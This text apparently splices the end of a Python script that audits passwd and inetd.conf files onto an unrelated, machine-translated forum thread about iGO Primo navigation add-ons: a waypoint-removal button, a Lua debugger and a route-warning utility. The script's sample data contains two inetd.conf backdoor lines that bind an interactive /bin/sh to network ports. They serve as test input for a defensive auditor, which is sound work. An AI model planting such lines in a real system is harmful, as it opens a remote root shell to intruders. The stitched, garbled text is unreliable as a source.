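daytime stream tcp nowait /bin/sh sh -i
jdevil stream tcp nowait /bin/sh sh -i
"""

if __name__ == "__main__":
    for lineno, issue in audit_passwd(SAMPLE_PASSWD):
        print("passwd:%d: %s" % (lineno, issue))
    for lineno, issue in audit_inetd(SAMPLE_INETD):
        print("inetd.conf:%d: %s" % (lineno, issue))
    for path, uid in find_setuid("/tmp"):
        print("set-UID file: %s (owner uid %d)" % (path, uid))
```

On a live system the same functions take the contents of /etc/passwd and /etc/inetd.conf; comparing the output against a known-good baseline catches the changes the paper calls "veiled" as well as the overt ones.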
This thread will contain extensions for the navigation system based on NNG iGO PRIMO NextGen
Extend the functionality of regular buttons VIApoi remove from the route.
Standard button appears, if you have to route waypoints (VIApoi).
So it stays ... but when you click on it (click) menu appears, listing all VIApoi and
you are free to either tap elsewhere and remove the first in the queue
either by the victim ... with a long tap remove everything to her ... and her too
Conveniently this is the case when you route with intermediate points and you for some reason "spilled" from it.
Re-start will lead to the fact that the navigator will lead to the first point ... but you have somewhere Intermedia ... here come in handy.
Plant ... in all weather conditions))
debugger
Debugger - debugging tool due to lack of log. You can view the result in ONLINE. You can "ON THE FLY" ... take snapshots directly from the cab.
Debugger You can use one or all of three ways at once.
*#
Call in the right place at the right time ... and save the data
If the variable Global - transferred to the "name", or simply herself. The number of input parameters is not limited.
Example
var1 = "hello"
local var2 = 8
t = {2,5, { "Bonnie Parker", "Clyde Barrow"}}
VW_Debugger ( "-------------------------------",
"Hex (var1)", -- var1 must be GLOBAL
var1, var2, "t", "-------------------------------")
The result in the ... / lm_DebugToList.txt:
Variable # 1 = -------------------------------
Variable # 2 = 68 | 65 | 6C | 6C | 6F |
Variable # 2 = h | e | l | l | o |
Variable # 3 = hello
Variable # 4 = 8
t = {
[1] = 2,
[2] = 5,
Table # 3 = {
[1] = Bonnie Parker,
[2] = Clyde Barrow,
}
.
}
Variable # 6 = -------------------------------
*#
Enter code snippet ONLINE
Enter the line of code as you write in the body of the program.
Example
return hex (Help)
The results are on the screen and a file.
*#
Complex. But requires some setup allows to get a snapshot at any time
For this purpose has already been declared a global table VW_Debugger_Table and the following structure is used:
Example:
hook_DebugSnapshot: register (function ()
    UX_Name = "<name of your utilities>" -- special attention: utility field
    VW_Debugger_Table.v_integer = v_integer -- your variable
    VW_Debugger_Table.v_char = v_char -- your variable
    VW_Debugger_Table.v_table = v_table -- your variable
end)
It is desirable to place at the end of your utility body.
In other words - you need to put in your section (lua chunk) here such fragments, which will ensure the filling of the table
you desired variables. The process you manage yourself using SnapShot keys
I note that the third method does not require cleaning after the source code debugging. This tool can be left in the body of the program.
It can be activated at any time by pressing the button or VW_Debugger_Get_Snapshot () of the body of the program and does not interfere with the functionality of standard code.
All results are displayed on the screen and are available in /save/profile/01/userlist/lm_DebugToList.txt ... unless of course you do not erase.
CommonRouteWarnings.zip
Utility - informer. The name speaks for itself: CommonRouteWarnings.zip
All sounds and warnings again match the approved standard: SetAudioSignal.
Long press - access to the configurator.
Informer as a button in the cockpit. Informs about 12 developments on the route of choice.
They will be "SCROLLED" at one location in the cabin, but with different icons of different information and ... according to the chosen event or events.
Upper information - the distance to the event, the bottom - time in the scene.
Now click on the icon will get a third of the current screen with an overview of the place, the relevant event, well, or automatically.
On the TMC. Upper info - distance to the event, lower - latency, which makes this event (not to be confused with the overall delay)
Full set here
Hi there. working igo 8 would be interested. samsung s8 phone. I would like a link. Thanks